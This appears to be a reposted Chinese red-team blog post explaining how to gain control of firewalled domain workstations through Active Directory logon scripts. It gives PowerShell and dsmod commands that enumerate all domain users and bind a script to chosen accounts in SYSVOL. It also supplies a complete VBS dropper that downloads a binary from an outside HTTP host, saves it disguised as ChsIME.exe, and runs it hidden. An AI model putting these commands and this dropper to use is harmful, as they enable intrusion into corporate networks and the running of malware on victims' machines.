首页 > 其他分享 >登录脚本下发

登录脚本下发

时间:2022-12-08 10:45:42浏览次数:66  
标签:脚本 objXMLHTTP Set Users 登录 DC 下发 com CN

0x1、利用场景

当获取到域控权限或domain admin等高权限时,想横向到域内PC主机上对方开启了防火墙,无法通过445、135进行横向利用,可以通过登录脚本绑定的方式获取目标主机权限。

0x2、利用方法

方法一、powershell win2012及以上自带,获取当前域用户信息

Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8

绑定指定用户

Set-ADUser -Identity zhangsan -ScriptPath "download.vbs"

解绑

Set-ADUser -Identity zhangsan -ScriptPath " "

方法二、利用dsmod进行绑定

 dsmod user -loscr "download.vbs" "CN=john,CN=Users,DC=redteam,DC=com"

解绑

dsmod user -loscr "" "CN=john,CN=Users,DC=redteam,DC=com"

刷新组策略

shell gpupdate /force

VBS内容

strFileURL = "http://192.168.172.129:82/logo.ico"strHDLocation = "C:\Users\Public\Documents\ChsIME.exe"Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")objXMLHTTP.open "GET", strFileURL, falseobjXMLHTTP.send()If objXMLHTTP.Status = 200 ThenSet objADOStream = CreateObject("ADODB.Stream")objADOStream.OpenobjADOStream.Type = 1 'adTypeBinaryobjADOStream.Write objXMLHTTP.ResponseBodyobjADOStream.Position = 0'Set the stream position to the startSet objFSO = Createobject("Scripting.FileSystemObject")If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocationSet objFSO = NothingobjADOStream.SaveToFile strHDLocationobjADOStream.CloseSet objADOStream = NothingEnd ifSet objXMLHTTP = NothingstrComputer = "."set ws=wscript.createobject("wscript.shell")val=ws.run ("C:\Users\Public\Documents\ChsIME.exe",0) 

上传至dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\目录下,通过方法一或方法二进行绑定后刷新组策略即可



 https://www.cnblogs.com/websecyw/p/16657762.html


标签:脚本,objXMLHTTP,Set,Users,登录,DC,下发,com,CN
From: https://www.cnblogs.com/backlion/p/16965424.html

相关文章

  • sh脚本小记
    #!/bin/bashwhiletrue;dosleep5;echo5;if["$(ps-ef|grepjobtracker|gawk'$0!~/grep/{print$2}'|tr-s'\n''')"=......
  • shell脚本列出docker所有tag
    docker-tags-list.sh#!/bin/bash#-----------------------------------------------------------------#FileName:docker-tags-list.sh#Date:2021-12-24#Author......
  • 华为路由器配置telnet与ssh远程登录
     2022.12.8--1.12分享华为路由器配置telnet与ssh远程登录1、interfaceGigabitEthernet0/0/0ipaddress192.168.1.1255.255.255.02、stelnetserverenable3......
  • (转)【Linux】Centos7 的 Systemctl 与 创建系统服务 (shell脚本)
    原文:https://blog.csdn.net/qq_42862247/article/details/127260241Systemctlsystemctl命令#启动systemctlstartNAME.service#停止systemctlstopNAME.service#重......
  • apifox 自动登录示例 前置操作 模拟登录
     //第一步:点击「根目录-前置操作」//第二步,环境变量中设置LOGIN_USERNAME和LOGIN_PASSWORD//第三步:必须让后端忽略验证码之类的验证//定义发送登录接口请......
  • (转)编写Shell脚本的最佳实践
    原文:https://blog.mythsman.com/post/5d2ab67ff678ba2eb3bd346f/?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io#--14前言由于工作需要,最近重新开始拾掇......
  • 009.完整实现登录功能
    1.修改UserService.javapackagecom.imooc.oa.service;importcom.imooc.oa.entity.User;importcom.imooc.oa.mapper.UserMapper;importcom.imooc.oa.service.exce......
  • ensp防火墙web界面登录
    今日分享ensp防火墙web界面登录1、进入防火墙;user:admin password:Admin@1232、进入管理接口;修改默认IP及网段;3、进入cloud;添加VMware8和udp类型为GE接口,4、cloud端口......
  • shell脚本分割字符窜
    如何在Bash脚本中分割字符串原创 TIAP TIAP 2022-12-0607:35 发表于山东收录于合集#bash9个#Linux145个TIAP技术分享,经验交流,职业生涯探讨。......
  • 博客园主题修改分享 - 脚本篇
    如题,本期主要是通过脚本来实现博客园的各自自定义效果说明脚本运行需要开通博客园的JS权限,不懂的可以去看上篇文章博客园主题修改分享里的增加鼠标动效;脚本内容有......